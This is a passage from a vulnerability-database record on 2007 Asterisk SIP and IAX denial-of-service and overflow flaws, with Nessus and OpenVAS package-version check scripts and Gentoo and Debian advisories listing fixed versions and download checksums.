rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-web-vmail\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-bristuff\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-classic\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-02-01T07:54:53", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200704-01\n(Asterisk: Two SIP Denial of Service vulnerabilities)\n\n The Madynes research team at INRIA has discovered that Asterisk\n contains a NULL pointer dereferencing error in the SIP channel when\n handling INVITE messages. Furthermore qwerty1979 discovered that\n Asterisk 1.2.x fails to properly handle SIP responses with return code\n 0.\n \nImpact :\n\n A remote attacker could cause an Asterisk server listening for SIP\n messages to crash by sending a specially crafted SIP message or\n answering with a 0 return code.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2020-02-02T00:00:00", "id": "GENTOO_GLSA-200704-01.NASL", "href": "https://www.tenable.com/plugins/nessus/24934", "published": "2007-04-05T00:00:00", "title": "GLSA-200704-01 : Asterisk: Two SIP Denial of Service vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200704-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24934);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:44\");\n\n script_cve_id(\"CVE-2007-1561\", \"CVE-2007-1594\");\n script_xref(name:\"GLSA\", value:\"200704-01\");\n\n script_name(english:\"GLSA-200704-01 : Asterisk: Two SIP Denial of Service vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200704-01\n(Asterisk: Two SIP Denial of Service vulnerabilities)\n\n The Madynes research team at INRIA has discovered that Asterisk\n contains a NULL pointer dereferencing error in the SIP channel when\n handling INVITE messages. Furthermore qwerty1979 discovered that\n Asterisk 1.2.x fails to properly handle SIP responses with return code\n 0.\n \nImpact :\n\n A remote attacker could cause an Asterisk server listening for SIP\n messages to crash by sending a specially crafted SIP message or\n answering with a 0 return code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200704-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Asterisk users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose net-misc/asterisk\n Note: Asterisk 1.0.x is no longer supported upstream so users should\n consider upgrading to Asterisk 1.2.x.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/asterisk\", unaffected:make_list(\"ge 1.2.14-r2\", \"rge 1.0.12-r2\"), vulnerable:make_list(\"lt 1.2.14-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Asterisk\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-02-01T02:36:51", "bulletinFamily": "scanner", "description": "This update fixes multiple bugs that allowed attackers to remotely\ncrash asterisk or cause an information leak (CVE-2007-1561,\nCVE-2007-1594, CVE-2007-1595, CVE-2007-2297, CVE-2007-2488).", "modified": "2020-02-02T00:00:00", "id": "SUSE_ASTERISK-3543.NASL", "href": "https://www.tenable.com/plugins/nessus/27157", "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : asterisk (asterisk-3543)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update asterisk-3543.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27157);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:29\");\n\n script_cve_id(\"CVE-2007-1561\", \"CVE-2007-1594\", \"CVE-2007-1595\", \"CVE-2007-2297\", \"CVE-2007-2488\");\n\n script_name(english:\"openSUSE 10 Security Update : asterisk (asterisk-3543)\");\n script_summary(english:\"Check for the asterisk-3543 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes multiple bugs that allowed attackers to remotely\ncrash asterisk or cause an information leak (CVE-2007-1561,\nCVE-2007-1594, CVE-2007-1595, CVE-2007-2297, CVE-2007-2488).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"asterisk-1.2.5-12.12\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"asterisk-1.2.13-23\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-01T06:52:30", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in Asterisk, a\nfree software PBX and telephony toolkit. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2007-1306\n ", "modified": "2020-02-02T00:00:00", "id": "DEBIAN_DSA-1358.NASL", "href": "https://www.tenable.com/plugins/nessus/25938", "published": "2007-08-28T00:00:00", "title": "Debian DSA-1358-1 : asterisk - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1358. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25938);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/08/02 13:32:20\");\n\n script_cve_id(\"CVE-2007-1306\", \"CVE-2007-1561\", \"CVE-2007-2294\", \"CVE-2007-2297\", \"CVE-2007-2488\", \"CVE-2007-3762\", \"CVE-2007-3763\", \"CVE-2007-3764\");\n script_xref(name:\"DSA\", value:\"1358\");\n\n script_name(english:\"Debian DSA-1358-1 : asterisk - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in Asterisk, a\nfree software PBX and telephony toolkit. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2007-1306\n 'Mu Security' discovered that a NULL pointer dereference\n in the SIP implementation could lead to denial of\n service.\n\n - CVE-2007-1561\n Inria Lorraine discovered that a programming error in\n the SIP implementation could lead to denial of service.\n\n - CVE-2007-2294\n It was discovered that a NULL pointer dereference in the\n manager interface could lead to denial of service.\n\n - CVE-2007-2297\n It was discovered that a programming error in the SIP\n implementation could lead to denial of service.\n\n - CVE-2007-2488\n Tim Panton and Birgit Arkestein discovered that a\n programming error in the IAX2 implementation could lead\n to information disclosure.\n\n - CVE-2007-3762\n Russell Bryant discovered that a buffer overflow in the\n IAX implementation could lead to the execution of\n arbitrary code.\n\n - CVE-2007-3763\n Chris Clark and Zane Lackey discovered that several NULL\n pointer dereferences in the IAX2 implementation could\n lead to denial of service.\n\n - CVE-2007-3764\n Will Drewry discovered that a programming error in the\n Skinny implementation could lead to denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-2294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-2297\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-2488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1358\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Asterisk packages.\n\nFor the oldstable distribution (sarge) these problems have been fixed\nin version 1.0.7.dfsg.1-2sarge5.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 1:1.2.13~dfsg-2etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/08/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"asterisk\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-config\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-dev\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-doc\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-gtk-console\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-h323\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-sounds-main\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"asterisk-web-vmail\", reference:\"1.0.7.dfsg.1-2sarge5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-bristuff\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-classic\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-config\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-dev\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-doc\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-h323\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"asterisk-web-vmail\", reference:\"1:1.2.13~dfsg-2etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "description": "### Background\n\nAsterisk is an open source implementation of a telephone private branch exchange (PBX). \n\n### Description\n\nThe Madynes research team at INRIA has discovered that Asterisk contains a null pointer dereferencing error in the SIP channel when handling INVITE messages. Furthermore qwerty1979 discovered that Asterisk 1.2.x fails to properly handle SIP responses with return code 0\\. \n\n### Impact\n\nA remote attacker could cause an Asterisk server listening for SIP messages to crash by sending a specially crafted SIP message or answering with a 0 return code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Asterisk users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose net-misc/asterisk\n\nNote: Asterisk 1.0.x is no longer supported upstream so users should consider upgrading to Asterisk 1.2.x.", "modified": "2007-04-02T00:00:00", "published": "2007-04-02T00:00:00", "id": "GLSA-200704-01", "href": "https://security.gentoo.org/glsa/200704-01", "type": "gentoo", "title": "Asterisk: Two SIP Denial of Service vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Application crash on malcrafted SIP packet.", "modified": "2007-03-22T00:00:00", "published": "2007-03-22T00:00:00", "id": "SECURITYVULNS:VULN:7344", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7344", "title": "Asterisk PBX SIP DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:27", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1358-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nAugust 26th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-1306 CVE-2007-1561 CVE-2007-2294 CVE-2007-2297 CVE-2007-2488 CVE-2007-3762 CVE-2007-3763 CVE-2007-3764\n\nSeveral remote vulnerabilities have been discovered in Asterisk, a free\nsoftware PBX and telephony toolkit. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-1306\n\n "Mu Security" discovered that a NULL pointer deference in the SIP\n implementation could lead to denial of service.\n\nCVE-2007-1561\n\n Inria Lorraine discovered that a programming error in the SIP\n implementation could lead to denial of service.\n\nCVE-2007-2294\n\n It was discovered that a NULL pointer deference in the manager\n interface could lead to denial of service.\n\nCVE-2007-2297\n\n It was discovered that a programming error in the SIP implementation\n could lead to denial of service.\n\nCVE-2007-2488\n\n Tim Panton and Birgit Arkestein discovered that a programming error\n in the IAX2 implementation could lead to information disclosure.\n\nCVE-2007-3762\n\n Russell Bryant discovered that a buffer overflow in the IAX\n implementation could lead to the execution of arbitrary code.\n\nCVE-2007-3763\n\n Chris Clark and Zane Lackey discovered that several NULL pointer\n deferences in the IAX2 implementation could lead to denial of\n service.\n\nCVE-2007-3764\n\n Will Drewry discovered that a programming error in the Skinny\n implementation could lead to denial of service.\n\nFor the oldstable distribution (sarge) these problems have been fixed in\nversion 1.0.7.dfsg.1-2sarge5.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 1:1.2.13~dfsg-2etch1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1:1.4.11~dfsg-1.\n\nWe recommend that you upgrade your Asterisk packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5.dsc\n Size/MD5 checksum: 1299 9990edac549f774358a79d593ff43a2d\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5.diff.gz\n Size/MD5 checksum: 72628 a792656a9b891c48038f16ed102da075\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 2929488 0d0f718ccd7a06ab998c3f637df294c0\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.0.7.dfsg.1-2sarge5_all.deb\n Size/MD5 checksum: 62122 4488dbad49606db2bb69979c6de5d9a1\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.0.7.dfsg.1-2sarge5_all.deb\n Size/MD5 checksum: 83904 01ec5e039b1f34c512a3816d0ff14290\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.0.7.dfsg.1-2sarge5_all.deb\n Size/MD5 checksum: 1578092 3bc955e7f50c8ee2ab0877c9bf6d7e27\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.0.7.dfsg.1-2sarge5_all.deb\n Size/MD5 checksum: 1180686 9b2af441ef41584b0ab64ed253400ed2\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.0.7.dfsg.1-2sarge5_all.deb\n Size/MD5 checksum: 28906 f487ba4ae90a38dac7d7892994977e78\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_alpha.deb\n Size/MD5 checksum: 1503206 a87cb7693d1e6ef9fa72725a07c58700\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_alpha.deb\n Size/MD5 checksum: 32282 15e30b5844a0436208fae8aef3bb8128\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_alpha.deb\n Size/MD5 checksum: 21684 65d467d776b77d4af8e7ba9695ea855f\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_amd64.deb\n Size/MD5 checksum: 1333966 35dea08bbb3e3ae98622bfc8e2395efa\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_amd64.deb\n Size/MD5 checksum: 31364 b4738c7141ebdb63ff40c4ec51db182d\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_amd64.deb\n Size/MD5 checksum: 21968 04e606d2f26e1b896e2c1e4b3afc0024\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_arm.deb\n Size/MD5 checksum: 1285102 17b0f44fe5799119c6a77aba693b1387\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_arm.deb\n Size/MD5 checksum: 30220 c7d9b2469dda7a56b2cbf37514e983a5\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_arm.deb\n Size/MD5 checksum: 21976 aa7e96d4660b32f99fbc23945b9ab92f\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_hppa.deb\n Size/MD5 checksum: 1448684 baf5d73032d0075fdc54aa8bc12624f3\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_hppa.deb\n Size/MD5 checksum: 32002 6e367939c617f4b86c1f9cc8ba1ed43c\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_hppa.deb\n Size/MD5 checksum: 21972 52e04cbfa198a686798e2aade3f5793d\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_i386.deb\n Size/MD5 checksum: 1175672 332441ac023e066bfad2e4df2ee35b82\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_i386.deb\n Size/MD5 checksum: 30384 714976ea15e1c161c77dff509d08af96\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_i386.deb\n Size/MD5 checksum: 21968 d1ee35f3e22dcd4a5319ae5b15817d0b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_ia64.deb\n Size/MD5 checksum: 1772012 ac19b785773eb877c29edb5a91c31767\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_ia64.deb\n Size/MD5 checksum: 33496 e1d9e1ceff20bd7bbd0c137239034b75\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_ia64.deb\n Size/MD5 checksum: 21966 f9b6ef26db22f14cb1a52e2b1a135c47\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_m68k.deb\n Size/MD5 checksum: 1185624 aef06cbcb10c08ced6a8238b4a272fd8\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_m68k.deb\n Size/MD5 checksum: 30750 8374561c75228f55694d1b941036294d\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_m68k.deb\n Size/MD5 checksum: 21976 983356c74964bc23471196afaed70837\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_mips.deb\n Size/MD5 checksum: 1264660 66d0b46d774ab9c61979b91fa1383593\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_mips.deb\n Size/MD5 checksum: 29964 8f58fa68511d70e3490df77fdfd5d3ca\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_mips.deb\n Size/MD5 checksum: 21972 46082fca9c342a46404ef189e1f1b635\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_mipsel.deb\n Size/MD5 checksum: 1270922 0528f3b6609060164bb81a1d19441eac\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_mipsel.deb\n Size/MD5 checksum: 29894 888c2904eaf40955ffcb6856e9ce2b55\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge5_mipsel.deb\n Size/MD5 checksum: 21974 a00d005468404f9b1b0c55f2f3e25c6b\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge5_powerpc.deb\n Size/MD5 checksum: 1422660 c2a3998e7716bc7215cad1d61329e161\n http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge5_powerpc.deb\n Size/MD5 checksum: 31694 44e05fd82fd1fef08a350805338168dc\n 